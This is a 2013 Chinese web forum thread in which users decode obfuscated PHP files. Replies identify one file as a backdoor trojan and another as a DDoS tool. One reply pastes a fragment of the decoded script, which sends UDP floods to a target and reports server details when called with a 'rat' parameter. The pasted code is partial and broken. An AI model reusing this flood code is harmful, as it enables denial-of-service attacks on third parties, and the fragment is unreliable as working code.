帮解密下几个php文件

Captain · 发表于 2013-6-20 20:10:10

本帖最后由 Captain 于 2013-6-20 20:11 编辑
[ol]

[/ol]复制代码[ol]

[/ol]复制代码

Captain · 发表于 2013-6-20 20:12:19

一共四个，高手帮忙

woweixiazai · 发表于 2013-6-20 20:14:29

免费劳动力楼下

Captain · 发表于 2013-6-20 20:31:55

Tou 发表于 2013-6-20 20:14

我试试

cuijz · 发表于 2013-6-20 20:14:00

第一个是[ol]

[/ol]复制代码明显是php后门木马

Captain · 发表于 2013-6-20 20:37:31

cuijz 发表于 2013-6-20 20:37

第一个是明显是php后门木马
最新的php ddos函数

cuijz · 发表于 2013-6-20 20:43:30

第2个是php ddos[ol]

0){

echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];

exit;

}

echo "Parameters can not be empty!";

exit;

}

for($i=0;$i $max_time){

break;

}

$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

echo "Send Host：$host:$port
";

echo "Send Flow：$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb
";

echo "Send Rate：" . round($packets/$exec_time, 2) . " packs/s；" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";

?>[/ol]复制代码

elves766 · 发表于 2013-6-20 20:37:00

看不懂路过

Captain莫桑比特 · 发表于 2013-6-20 20:55:57

cuijz 发表于 2013-6-20 20:55

第2个是php ddos
最新的函数用上tcp了，难防御了还是IIS配置比较好防御

过客 · 发表于 2013-6-20 21:01:11

Captain 发表于 2013-6-20 20:12

一共四个，高手帮忙
把eval改成echo，马上出原形。

		自动登录	找回密码
密码			立即注册